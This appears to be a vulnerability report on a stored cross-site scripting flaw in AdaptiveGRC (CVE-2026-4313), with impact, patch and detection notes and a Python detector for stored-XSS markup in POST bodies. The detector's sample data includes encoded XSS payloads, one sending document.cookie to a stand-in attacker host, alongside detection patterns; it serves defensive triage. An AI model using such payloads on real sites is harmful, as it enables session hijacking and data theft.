Full Report
Cross-site Scripting vulnerability (CVE-2026-4313) has been found in AdaptiveGRC software.
Analysis Summary
# Vulnerability: Stored Cross-Site Scripting (XSS) in AdaptiveGRC
## CVE Details
- **CVE ID**: CVE-2026-4313
- **CVSS Score**: Not explicitly provided in the article (High severity implied)
- **CWE**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
## Affected Systems
- **Products**: AdaptiveGRC (by vendor C&F)
- **Versions**: All versions released before December 2025.
- **Configurations**: Standard web interface deployments using text-type fields in forms.
## Vulnerability Description
AdaptiveGRC is vulnerable to stored cross-site scripting. The flaw lies in text-type fields used across various internal forms. An authenticated attacker can intercept an HTTP POST request (for example with an intercepting proxy), edit the field value in the request body to bypass any client-side restrictions, and submit a script payload. Because the server neither rejects the value on input nor encodes it when it renders the page, the payload is stored and later executed in the browser of any user, including administrators, who views the affected page.
## Exploitation
- **Status**: Reported via Coordinated Vulnerability Disclosure (CVD). No active exploitation in the wild mentioned.
- **Complexity**: Low (requires basic interception/modification of POST requests).
- **Attack Vector**: Network (Authenticated).
## Impact
- **Confidentiality**: High (the script runs in the victim's session and can read any data the victim's pages expose; if the session cookie is not marked HttpOnly it can also be exfiltrated for session hijacking).
- **Integrity**: High (the script can issue requests as the victim, so an administrator victim means arbitrary administrative actions, whether or not the cookie itself is readable).
- **Availability**: Medium (UI defacement or disruption of administrative functions).
## Remediation
### Patches
- Users should update to the version of AdaptiveGRC released in **December 2025** or later, which contains the fix for this vulnerability.
### Workarounds
- No workaround is given in the advisory. Limiting the application to trusted personnel reduces exposure but does not remove it: any authenticated user who can write to a text-type field is a potential attacker, so the December 2025 update is the only real fix.
## Detection
- **Indicators of Compromise**: None published. The practical indicator is attacker markup (`<script>`, `<img ... onerror=`, `javascript:` URIs and similar) in a stored text-type field or in a POST body; decode URL-encoded bodies before matching, since a form-encoded payload never contains a literal `<`.
- **Detection methods and tools**:
- Query the application's own data for stored field values containing tags or event-handler attributes; this is the most reliable check, because web server access logs normally record the request line, not the POST body.
- Review access logs and audit trails for administrative sessions from unexpected IP addresses (possible session hijacking).
- Use a WAF with XSS rules (`<script`, `onerror=`, `onload=` and so on) as a partial, bypassable control while unpatched; it is not a substitute for the update.
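The following is an added detection example, not a tool from the advisory or the vendor: it scans a constructed application-level log of POST bodies (hypothetical field names; the real parameter names are not given here) for stored-XSS indicators. It decodes single and double URL-encoding and HTML numeric entities before matching, uses tag and event-handler patterns that follow browser tokenisation closely enough to leave benign text such as `a < b` and `onboarding=done` unflagged, and contrasts the result with a naive `<script` search over the raw bodies, which finds nothing.

```python
import html
import re
from urllib.parse import parse_qs, unquote

# Constructed application-level request log: (request id, raw POST body).
# Field names are hypothetical; AdaptiveGRC's own parameter names are not used.
SAMPLE_POST_BODIES = [
    ("req-1", "name=Quarterly+risk+review&description=Owner+sign-off+pending"),
    ("req-2", "name=Test&description=%3Cscript%3Efetch%28%22https%3A%2F%2Fattacker.invalid"
              "%2F%3Fc%3D%22%2Bdocument.cookie%29%3C%2Fscript%3E"),
    # double URL-encoded payload, a common WAF evasion
    ("req-3", "name=%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E&description=double"),
    # benign text that a careless pattern would flag ('<' followed by a space, 'onboarding=')
    ("req-4", "name=Vendor&description=Contract+value+%3C+limit%2C+escalate+onboarding%3Ddone"),
    # numeric-entity obfuscated javascript: URI inside an attribute
    ("req-5", "name=Link&description=%3Ca+href%3D%22%26%23106%3Bavascript%3Aalert%281%29%22%3Eclick%3C%2Fa%3E"),
]

INDICATORS = {
    # browsers open a tag only when '<' is immediately followed by a name char, '/', '!' or '?'
    "html_tag": re.compile(r"<[a-z!/?]", re.I),
    "dangerous_element": re.compile(r"</?\s*(?:script|svg|iframe|object|embed|math)\b", re.I),
    "event_handler": re.compile(
        r"\bon(?:error|load|focus|blur|click|input|change|toggle|mouse\w*|key\w*|animation\w*|transition\w*)\s*=",
        re.I),
    "script_uri": re.compile(r"(?:javascript|vbscript)\s*:", re.I),
}


def normalize(value: str, max_rounds: int = 3) -> str:
    """Undo the encodings that are stripped before markup is interpreted:
    bounded repeated percent-decoding, then HTML entity decoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def find_indicators(value: str) -> list[str]:
    """Names of the XSS indicators present in a single field value."""
    normalized = normalize(value)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(normalized))


def scan(bodies) -> list[dict]:
    """One finding per (request, field) whose decoded value carries an indicator."""
    findings = []
    for request_id, body in bodies:
        for field, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                hits = find_indicators(value)
                if hits:
                    findings.append({"request": request_id, "field": field,
                                     "indicators": hits, "decoded": normalize(value)})
    return findings


def naive_raw_grep(bodies) -> list[str]:
    """What a plain '<script' search over raw bodies returns: nothing, because a
    form-encoded body carries '%3Cscript', never a literal '<script'."""
    return [request_id for request_id, body in bodies if "<script" in body.lower()]


if __name__ == "__main__":
    for finding in scan(SAMPLE_POST_BODIES):
        print(finding)
    print("naive grep hits:", naive_raw_grep(SAMPLE_POST_BODIES))
```

The same `find_indicators` function can be run over field values exported from the application's database, which is where a stored payload ultimately lives; the patterns are heuristics, so treat hits as triage leads rather than proof of compromise.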
## References
- CERT Polska Advisory: hxxps[://]cert[.]pl/en/posts/2026/04/cve-2026-4313/
- CVE Record: hxxps[://]www[.]cve[.]org/CVERecord?id=CVE-2026-4313
- Vendor Site: hxxp[://]candf[.]com/ (C&F)